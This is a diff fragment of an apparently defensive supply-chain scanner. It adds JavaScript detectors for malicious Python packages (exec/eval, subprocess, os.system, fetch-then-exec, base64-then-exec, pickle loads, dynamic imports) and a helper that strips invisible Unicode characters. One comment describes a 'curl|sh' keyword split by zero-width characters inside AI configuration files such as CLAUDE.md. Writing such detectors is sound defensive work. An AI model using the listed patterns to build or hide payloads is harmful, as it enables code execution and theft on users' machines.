 * strings, ordinary strings and `#` comments, so that a delimiter appearing
 * inside another lexical context is never treated as an opener. Running two
 * independent global replaces instead would let a `"""` embedded in a
 * `'''...'''` string (or in an ordinary string or comment) pair with a later
 * `"""` and silently erase the real code in between. Backslash-escaped quotes
 * inside a string do not terminate it.
 *
 * @param {string} content - Python source text.
 * @returns {string} Text with every triple-quoted literal collapsed to `""`
 *   or `''`; everything else is returned unchanged.
 */
function stripTripleQuotedStrings(content) {
  // Alternatives are ordered so a triple quote is tried before an ordinary
  // quote at the same position. Ordinary strings may not span a raw newline
  // unless it is backslash-escaped.
  const lexeme = /"""(?:\\[\s\S]|[^\\])*?"""|'''(?:\\[\s\S]|[^\\])*?'''|"(?:\\[\s\S]|[^"\\\r\n])*"|'(?:\\[\s\S]|[^'\\\r\n])*'|#[^\r\n]*/g;
  return content.replace(lexeme, (token) => {
    if (token.startsWith('"""')) return '""';
    if (token.startsWith("'''")) return "''";
    // Ordinary strings and comments are only matched to skip over them.
    return token;
  });
}
149
+
150
+ // --- Pattern detectors. All operate on a content string that has already
151
+ // been Unicode-normalized + comment-stripped + docstring-stripped.
152
+
153
/**
 * Report whether the text contains a bare `exec(` or `eval(` call.
 *
 * @param {string} content - Pre-processed Python source text.
 * @returns {boolean} True when such a call is present.
 */
function detectImportTimeExec(content) {
  // The lookbehind rejects a preceding `.` or word character, so attribute
  // calls (obj.exec(...)) and longer names (ast.literal_eval(...)) are ignored.
  const bareExecOrEval = /(?<![.\w])(exec|eval)\s*\(/;
  return content.search(bareExecOrEval) !== -1;
}
157
+
158
/**
 * Report whether the text calls one of the process-spawning helpers of the
 * `subprocess` module.
 *
 * @param {string} content - Pre-processed Python source text.
 * @returns {boolean} True when such a call is present.
 */
function detectImportTimeSubprocess(content) {
  const spawnCall = /\bsubprocess\.(Popen|run|call|check_output|check_call|getoutput|getstatusoutput)\s*\(/;
  return content.search(spawnCall) !== -1;
}
161
+
162
/**
 * Report whether the text calls a shell/process primitive on `os`:
 * `os.system`, `os.popen` (optionally suffixed 2/3/4), `os.spawn*` or
 * `os.exec*`.
 *
 * @param {string} content - Pre-processed Python source text.
 * @returns {boolean} True when such a call is present.
 */
function detectImportTimeOsSystem(content) {
  // spawn/exec need at least one trailing lowercase letter (execv, spawnlp, ...).
  const osShellCall = /\bos\.(system|popen[234]?|spawn[a-z]+|exec[a-z]+)\s*\(/;
  return content.search(osShellCall) !== -1;
}
166
+
167
/**
 * Report whether the text references a known HTTP client entry point
 * (urllib.request / urllib2 urlopen, requests verbs, http.client connections,
 * httpx verbs or clients, aiohttp.ClientSession).
 *
 * @param {string} content - Pre-processed Python source text.
 * @returns {boolean} True when at least one signature matches.
 */
function detectNetworkFetch(content) {
  // One signature per supported client; a single hit is enough.
  const fetchSignatures = [
    /\burllib\.request\.urlopen\s*\(/,
    /\burllib2\.urlopen\s*\(/,
    /\brequests\.(get|post|put|delete|patch|head|options|request)\s*\(/,
    /\bhttp\.client\.HTTPS?Connection\b/,
    /\bhttpx\.(get|post|put|delete|patch|head|options|request|Client|AsyncClient)\b/,
    /\baiohttp\.ClientSession\b/
  ];
  return fetchSignatures.some((signature) => signature.test(content));
}
176
+
177
/**
 * Report whether `content` calls a decoder of the Python `base64` module or
 * `codecs.decode(`.
 *
 * Every decoder exposed by the `base64` module is covered, not only the
 * base64/32/16 ones: `a85decode`, `b85decode`, `z85decode`, `b32hexdecode`,
 * `decodebytes` and the legacy `decodestring` are equally usable to unpack
 * an embedded payload, so leaving them out would let a trivial codec swap
 * bypass the "decode + exec" compound rule.
 *
 * @param {string} content
 * @returns {boolean}
 */
function detectBase64Decode(content) {
  const base64ModuleDecode =
    /\bbase64\.(?:(?:b64|standard_b64|urlsafe_b64|b32|b32hex|b16|a85|b85|z85)decode|decodebytes|decodestring)\s*\(/;
  if (base64ModuleDecode.test(content)) return true;
  return /\bcodecs\.decode\s*\(/.test(content);
}
182
+
183
/**
 * Report whether `content` calls `.load(` or `.loads(` on one of the
 * listed object-deserialization modules (pickle, cPickle, marshal, dill,
 * cloudpickle, jsonpickle, shelve).
 *
 * @param {string} content
 * @returns {boolean}
 */
function detectDeserialization(content) {
  const unsafeLoad = /\b(pickle|cPickle|marshal|dill|cloudpickle|jsonpickle|shelve)\.loads?\s*\(/;
  return unsafeLoad.test(content);
}
186
+
187
/**
 * Report whether `content` contains `__import__(` with a hardcoded string
 * naming a sensitive module (subprocess, os, requests, urllib, urllib2,
 * socket, http, ssl, ctypes, importlib).
 *
 * A dotted submodule suffix is accepted after the top-level name, so
 * `__import__('urllib.request')`, `__import__("http.client")` and
 * `__import__('os.path')` match as well. Those are the usual spellings for
 * the package-style entries in the list, and they load the same top-level
 * package. Names that merely start with a listed module (`osquery`,
 * `socketserver`) still do not match, because the name must be followed by
 * either `.` or the closing quote.
 *
 * @param {string} content
 * @returns {boolean}
 */
function detectDynamicDangerousImport(content) {
  const dangerousImport =
    /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)(?:\.[\w.]*)?['"]/;
  return dangerousImport.test(content);
}
190
+
191
/**
 * Scan the Python files selected by `findTargetPythonFiles(targetPath)` and
 * collect one threat record per rule that fires in each file.
 *
 * Per file: entries that cannot be stat'ed or read, are not regular files,
 * are empty, or exceed MAX_FILE_SIZE are skipped silently. The invisible
 * Unicode check runs on the raw text; all other detectors run on text with
 * invisible codepoints removed, triple-quoted strings stripped and full-line
 * comments blanked. Compound rules are reported in addition to the
 * individual rules that compose them.
 *
 * @param {string} targetPath
 * @returns {Array<{type: string, severity: string, message: string, file: string}>}
 */
function scanPythonSource(targetPath) {
  const threats = [];

  for (const file of findTargetPythonFiles(targetPath)) {
    let stat;
    try {
      stat = fs.statSync(file);
    } catch { continue; }
    const scannable = stat.isFile() && stat.size !== 0 && !(stat.size > MAX_FILE_SIZE);
    if (!scannable) continue;

    let rawContent;
    try {
      rawContent = fs.readFileSync(file, 'utf8');
    } catch { continue; }

    const relPath = path.relative(targetPath, file);
    const report = (type, severity, message) => {
      threats.push({ type, severity, message, file: relPath });
    };

    // PYSRC-008: Unicode obfuscation, measured on the raw (unstripped) text.
    const invisibleCount = countInvisibleUnicode(rawContent);
    if (invisibleCount >= PYSRC_UNICODE_THRESHOLD) {
      report(
        'python_source_unicode_obfuscation',
        'CRITICAL',
        `${relPath}: ${invisibleCount} invisible Unicode chars (zero-width / directional / variation selectors) — possible obfuscation hiding payload content from human review.`
      );
    }

    // Normalize: drop invisible codepoints (only when some were counted),
    // then strip docstrings, then blank full-line comments.
    const normalized = invisibleCount > 0 ? stripInvisibleUnicode(rawContent) : rawContent;
    const cleaned = stripPythonComments(stripTripleQuotedStrings(normalized));

    const hasExec = detectImportTimeExec(cleaned);
    const hasFetch = detectNetworkFetch(cleaned);
    const hasBase64 = detectBase64Decode(cleaned);

    // [fired, type, severity, message], listed in reporting order: the
    // individual rules first, then the compound rules.
    const rules = [
      [
        hasExec,
        'import_time_exec',
        'CRITICAL',
        `${relPath}: exec()/eval() at module level — direct code execution on import or pip install (RCE).`
      ],
      [
        detectImportTimeSubprocess(cleaned),
        'import_time_subprocess',
        'CRITICAL',
        `${relPath}: subprocess.Popen/run/call/check_output — spawns external process on import or install.`
      ],
      [
        detectImportTimeOsSystem(cleaned),
        'import_time_os_system',
        'CRITICAL',
        `${relPath}: os.system()/os.popen()/os.spawn*()/os.exec*() — shell execution on import or install.`
      ],
      [
        detectDeserialization(cleaned),
        'import_time_deserialization',
        'CRITICAL',
        `${relPath}: pickle/marshal/dill/cloudpickle/jsonpickle .loads() — unsafe deserialization, trivially RCE if input is attacker-controlled.`
      ],
      [
        detectDynamicDangerousImport(cleaned),
        'dynamic_dangerous_import',
        'HIGH',
        `${relPath}: __import__() with hardcoded dangerous module name (subprocess/os/requests/urllib/socket/...) — obfuscation pattern to evade static analysis.`
      ],
      [
        hasFetch && hasExec,
        'import_time_fetch_exec',
        'CRITICAL',
        `${relPath}: network fetch (urllib/requests/http.client/httpx/aiohttp) AND exec/eval in same file — TrapDoor-style remote-payload-then-RCE.`
      ],
      [
        hasBase64 && hasExec,
        'import_time_base64_exec',
        'CRITICAL',
        `${relPath}: base64/codecs decode AND exec/eval in same file — obfuscated payload execution pattern.`
      ]
    ];

    for (const [fired, type, severity, message] of rules) {
      if (fired) report(type, severity, message);
    }
  }

  return threats;
}
303
+
304
+ module.exports = {
305
+ scanPythonSource,
306
+ // Exported for unit testing of the helpers in isolation.
307
+ _internal: {
308
+ findTargetPythonFiles,
309
+ stripPythonComments,
310
+ stripTripleQuotedStrings,
311
+ detectImportTimeExec,
312
+ detectImportTimeSubprocess,
313
+ detectImportTimeOsSystem,
314
+ detectNetworkFetch,
315
+ detectBase64Decode,
316
+ detectDeserialization,
317
+ detectDynamicDangerousImport
318
+ }
319
+ };
@@ -0,0 +1,164 @@
1
+ 'use strict';
2
+
3
+ /**
4
+ * Unicode invisible character helpers — shared by obfuscation.js and ai-config.js.
5
+ *
6
+ * Extracted v2.11.25 (TrapDoor campaign, mai 2026) : la fonction locale dans
7
+ * obfuscation.js couvrait `.js/.cjs/.mjs/.ts/.tsx/.py` mais pas les configs IA
8
+ * (.cursorrules, CLAUDE.md). En la partageant, ai-config.js peut normaliser le
9
+ * contenu avant ses regex et bloquer le vecteur "cu<U+200B>rl|sh" avec ZW
10
+ * interspersés dans le mot-clé.
11
+ *
12
+ * Codepoints détectés (superset du scope original obfuscation.js, qui n'incluait
13
+ * pas LRM/RLM ni les directional override) :
14
+ *
15
+ * Zero-width:
16
+ * U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ
17
+ * U+2060 word joiner
18
+ * U+180E Mongolian vowel separator
19
+ *
20
+ * Directional (bidi spoofing — Trojan Source CVE-2021-42574) :
21
+ * U+200E LRM, U+200F RLM
22
+ * U+202A LRE, U+202B RLE, U+202C PDF, U+202D LRO, U+202E RLO
23
+ *
24
+ * Invisible math operators (peuvent casser un parser sans être vus) :
25
+ * U+2061 function application, U+2062 invisible times,
26
+ * U+2063 invisible separator, U+2064 invisible plus
27
+ *
28
+ * BOM (mid-text only; position 0 est légitime UTF-8 BOM) :
29
+ * U+FEFF
30
+ *
31
+ * Variation selectors :
32
+ * U+FE00-FE0E (excludes U+FE0F emoji presentation selector — légitime)
33
+ * U+E0100-E01EF supplementary plane variation selectors
34
+ *
35
+ * Tag characters (utilisés par GlassWorm pour encoder du payload) :
36
+ * U+E0001, U+E0020-E007F
37
+ *
38
+ * CJK, accents, emoji standards (avec U+FE0F) sont volontairement EXCLUS — pas
39
+ * de FP attendu sur du contenu international légitime.
40
+ *
41
+ * Références :
42
+ * - https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode
43
+ * - https://trojansource.codes/ (Trojan Source, CVE-2021-42574)
44
+ * - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
45
+ */
46
+
47
/**
 * Classify the codepoint that starts at UTF-16 index `i` of `content`.
 *
 * The result has two flags:
 *   - `invisible`: the codepoint belongs to one of the invisible families
 *     checked below;
 *   - `supplementary`: the codepoint is above U+FFFF, i.e. it occupies two
 *     UTF-16 code units, so the caller must advance by one extra index to
 *     skip the low surrogate half.
 *
 * @param {string} content
 * @param {number} i
 * @returns {{ invisible: boolean, supplementary: boolean }}
 */
function inspectCodepoint(content, i) {
  const cp = content.codePointAt(i);

  const invisible =
    // U+200B ZWSP, U+200C ZWNJ, U+200D ZWJ, U+200E LRM, U+200F RLM
    (cp >= 0x200B && cp <= 0x200F) ||
    // U+202A-U+202E directional embeddings / overrides (Trojan Source)
    (cp >= 0x202A && cp <= 0x202E) ||
    // U+2060 word joiner, U+2061-U+2064 invisible math operators
    (cp >= 0x2060 && cp <= 0x2064) ||
    // U+180E Mongolian vowel separator
    cp === 0x180E ||
    // U+FEFF is only flagged away from index 0 (a leading BOM is tolerated)
    (cp === 0xFEFF && i > 0) ||
    // U+FE00-U+FE0E variation selectors; U+FE0F (emoji presentation) excluded
    (cp >= 0xFE00 && cp <= 0xFE0E) ||
    // U+E0100-U+E01EF variation selectors supplement
    (cp >= 0xE0100 && cp <= 0xE01EF) ||
    // Tag characters: U+E0001 and U+E0020-U+E007F
    cp === 0xE0001 ||
    (cp >= 0xE0020 && cp <= 0xE007F);

  return { invisible, supplementary: cp > 0xFFFF };
}
107
+
108
/**
 * Tally the invisible Unicode codepoints found in `content`, as classified
 * by `inspectCodepoint`. A supplementary codepoint counts once even though
 * it spans two UTF-16 code units.
 *
 * @param {string} content
 * @returns {number}
 */
function countInvisibleUnicode(content) {
  let total = 0;
  let pos = 0;
  while (pos < content.length) {
    const verdict = inspectCodepoint(content, pos);
    if (verdict.invisible) total += 1;
    // Step over both surrogate halves of a supplementary codepoint.
    pos += verdict.supplementary ? 2 : 1;
  }
  return total;
}
123
+
124
/**
 * Build a copy of `content` from which every codepoint that
 * `inspectCodepoint` classifies as invisible has been dropped.
 *
 * Intended as a normalization step before pattern matching, so that a
 * keyword split by zero-width characters (`cu<U+200B>rl`) is seen by the
 * regexes as the plain keyword.
 *
 * @param {string} content
 * @returns {string}
 */
function stripInvisibleUnicode(content) {
  // Fast path: a string made only of code units <= 0x7F is pure ASCII and is
  // returned as-is.
  let firstHigh = 0;
  while (firstHigh < content.length && !(content.charCodeAt(firstHigh) > 0x7F)) {
    firstHigh += 1;
  }
  if (firstHigh === content.length) return content;

  let kept = '';
  let pos = 0;
  while (pos < content.length) {
    const { invisible, supplementary } = inspectCodepoint(content, pos);
    // A supplementary codepoint spans two code units; keep or drop both.
    const width = supplementary ? 2 : 1;
    if (!invisible) kept += content.slice(pos, pos + width);
    pos += width;
  }
  return kept;
}
160
+
161
+ module.exports = {
162
+ countInvisibleUnicode,
163
+ stripInvisibleUnicode
164
+ };